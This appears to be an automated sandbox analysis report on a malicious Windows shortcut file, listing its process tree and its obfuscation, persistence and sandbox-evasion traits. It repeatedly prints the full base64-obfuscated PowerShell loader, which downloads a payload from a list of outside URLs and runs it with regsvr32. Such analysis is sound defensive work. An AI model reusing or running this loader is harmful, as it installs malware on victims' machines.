Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220523 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txiyar5n.dg2.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winLNK@14/8@2/4
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW, 4_2_0000000180006F2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" Jump to behavior
Suspicious command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D15D push ebx; retn 0068h 3_2_000000018000D15E
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CB0CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_00007FFA51CB0CC0
PE file contains an invalid checksum
Source: IKdzfJtQpj.BCP.2.dr Static PE information: real checksum: 0x654f5 should be: 0x60ea5
Registers a DLL
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll"

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036 Thread sleep count: 7004 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep count: 2321 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5772 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5340 Thread sleep time: -60000s >= -30000s Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7004 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2321 Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\System32\regsvr32.exe API coverage: 9.5 %
